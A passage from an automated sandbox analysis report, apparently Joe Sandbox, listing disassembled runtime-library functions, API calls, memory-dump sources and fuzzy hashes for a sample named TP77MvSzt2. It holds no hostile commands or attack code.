                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 048593B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                  • String ID:
                                                                                  • API String ID: 737400349-0
                                                                                  • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction ID: 3258577d6a8e24dcbbbbadb9141d5fb9a156d2a81f2a4454874c4283747f4ebb
                                                                                  • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                  • Instruction Fuzzy Hash: 8B01F3B2100148BBDF125F998C40DEB3BAAEF48758F044A14FE08A6130D672E861DBA1
                                                                                  Function 00434F4F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                                                  • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                                                  Function 048651B6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0486515D,00000000,00000000,00000000,00000000,?,04865415,00000006,0044A378), ref: 048651E8
                                                                                  • GetLastError.KERNEL32(?,0486515D,00000000,00000000,00000000,00000000,?,04865415,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,04862233), ref: 048651F4
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0486515D,00000000,00000000,00000000,00000000,?,04865415,00000006,0044A378,0044A370,0044A378,00000000), ref: 04865202
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 3177248105-0
                                                                                  • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction ID: ecb4268de37a03e7928ebe33f7ff5ac55c936ca769ac81fd77faa31a720c7aa3
                                                                                  • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                  • Instruction Fuzzy Hash: 8501D43A611226BBC7618F79BC45A577798AF06FA2B100B30F917E3344D720E900CAE8
                                                                                  Function 0042614E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                  • String ID:
                                                                                  • API String ID: 78362717-0
                                                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                                                  Function 048563B5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 048563CF
                                                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 048563E3
                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 048563FB
                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 04856413
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                  • String ID:
                                                                                  • API String ID: 78362717-0
                                                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction ID: afb5d691578a3ba950c5dde80ee21f918227d36162581b065f686ba5840941f4
                                                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                  • Instruction Fuzzy Hash: 47012632700124A7DF11EE5CC800AEF77A9AF80364F000A11EC19FB2A1EAB0FD0182E1
                                                                                  Function 04852BA2 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 04852BD1
                                                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 04852BEF
                                                                                    • Part of subcall function 048486A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 048486C8
                                                                                    • Part of subcall function 048486A7: Hash.LIBCMT ref: 04848708
                                                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 04852BF8
                                                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 04852C18
                                                                                    • Part of subcall function 0484F6FF: Hash.LIBCMT ref: 0484F711
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                  • String ID:
                                                                                  • API String ID: 2250070497-0
                                                                                  • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                  • Instruction ID: 9683f083a2e82c3f1d2aee287f37318397ebf510cbc723480a881ebc33df6b0c
                                                                                  • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                  • Instruction Fuzzy Hash: 6D118E76400604AFD715DFA8C8809CAF7B8AF59310F044A5EEA56C7161DBB0F904CBA1
                                                                                  Function 04852BB1 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 04852BD1
                                                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 04852BEF
                                                                                    • Part of subcall function 048486A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 048486C8
                                                                                    • Part of subcall function 048486A7: Hash.LIBCMT ref: 04848708
                                                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 04852BF8
                                                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 04852C18
                                                                                    • Part of subcall function 0484F6FF: Hash.LIBCMT ref: 0484F711
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                  • String ID:
                                                                                  • API String ID: 2250070497-0
                                                                                  • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                  • Instruction ID: f72b83e06f820932450d064abfd167fe2a4929a330f8eb5833dffc00e6281aa6
                                                                                  • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                  • Instruction Fuzzy Hash: D4011776500604ABD715EFA9C881DDAF7E8AF59314F008A1EEA56C7150DBB0F9448BA1
                                                                                  Function 00405944 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                                                    • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                                                  • __Getcoll.LIBCPMT ref: 004059A5
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                  • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                                                  • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                  • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                                                  Function 00404E88 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                                                    • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                                                  • __Getcoll.LIBCPMT ref: 00404EE9
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                  • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                                                  • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                  • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                                                  Function 048350EF Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 048350F6
                                                                                    • Part of subcall function 0483BDD3: __EH_prolog3_GS.LIBCMT ref: 0483BDDA
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 04835141
                                                                                  • __Getcoll.LIBCPMT ref: 04835150
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 04835160
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                  • Instruction ID: 449efb01455fda9885334cb508a1624ba3145b834d1af700cfbc3ce3eee18b35
                                                                                  • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                  • Instruction Fuzzy Hash: 8A014071D10208EFEB00EFA8C440B9DB7B0BF4431AF108A19D555EB241D7B8B944CB92
                                                                                  Function 04835BAB Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 04835BB2
                                                                                    • Part of subcall function 0483BDD3: __EH_prolog3_GS.LIBCMT ref: 0483BDDA
                                                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 04835BFD
                                                                                  • __Getcoll.LIBCPMT ref: 04835C0C
                                                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 04835C1C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                  • String ID:
                                                                                  • API String ID: 1836011271-0
                                                                                  • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                  • Instruction ID: eda929c4aeb33b2a598abcc8968f0302d72b0112b1e476b52962a4a7f7b6a11b
                                                                                  • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                  • Instruction Fuzzy Hash: C7014071910208EFEB00EFA8C44079DB7B0BF4431AF108E19D145EB241C7B4B544CBD2
                                                                                  Function 0041BEF7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Compare_exchange_acquire_4std::_
                                                                                  • String ID:
                                                                                  • API String ID: 3973403980-0
                                                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                                                  Function 0484C15E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C190
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C1A0
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C1B0
                                                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0484C1C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Compare_exchange_acquire_4std::_
                                                                                  • String ID:
                                                                                  • API String ID: 3973403980-0
                                                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction ID: 748a34315a2e90c0bc53696241266f29aa3be2b154b4fe798a76a50b5b414a96
                                                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                  • Instruction Fuzzy Hash: D901313B00611DBBDF119F58DD008AD3F2EBF95258F158A12FA18C4034E332E270AB86
                                                                                  Function 0040D244 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                                                    • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                                                    • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                  • String ID:
                                                                                  • API String ID: 4284812201-0
                                                                                  • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                  • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                                                  • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                  • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                                                  Function 0041352C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                                                    • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                                                    • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                                                  • GetLastError.KERNEL32 ref: 00413561
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                                                    • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                  • String ID:
                                                                                  • API String ID: 1674182817-0
                                                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                                                  Function 0483D4AB Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 04841362
                                                                                    • Part of subcall function 04840BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 04840BF6
                                                                                    • Part of subcall function 04840BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 04840C17
                                                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 04841375
                                                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 04841381
                                                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0484138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                  • String ID:
                                                                                  • API String ID: 4284812201-0
                                                                                  • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                  • Instruction ID: 502b4c51e0bdcb01db52b8bb4ae3f57a633da8b35addce99d64e6b7d8ac0843f
                                                                                  • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                                                  • Instruction Fuzzy Hash: C3F0243078060C67AF24BAAC081C5AF62965FD2318B040B79DB51EB3C0DEB87D4493DA
                                                                                  Function 04843793 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 048437AC
                                                                                    • Part of subcall function 04842B36: ___crtGetTimeFormatEx.LIBCMT ref: 04842B4C
                                                                                    • Part of subcall function 04842B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 04842B6B
                                                                                  • GetLastError.KERNEL32 ref: 048437C8
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 048437DE
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048437EC
                                                                                    • Part of subcall function 0484290C: SetThreadPriority.KERNEL32(?,?), ref: 04842918
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                  • String ID:
                                                                                  • API String ID: 1674182817-0
                                                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction ID: 5c9133b180e3eac28bd7ec19801afc41ae49ee48b1dfb1af1212904c576bc6bb
                                                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                  • Instruction Fuzzy Hash: 91F027B2A0031D39F320B7794C06FBB369C9B40794F500E6BB944E20C0EDD8F40082B9
                                                                                  Function 0484D094 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0484D0A8
                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0484D0CC
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0484D0DF
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0484D0ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                  • String ID:
                                                                                  • API String ID: 3657713681-0
                                                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction ID: d50d4340bfb23063ebddd877d96e7dd736689bfd5c06959d1b52e914fcdf30c4
                                                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                  • Instruction Fuzzy Hash: 10F0B43560010C678724FA59E851C6DB3BA9ED1B197208F1A990693291EAB5B90AC692
                                                                                  Function 00412611 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                                                  • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
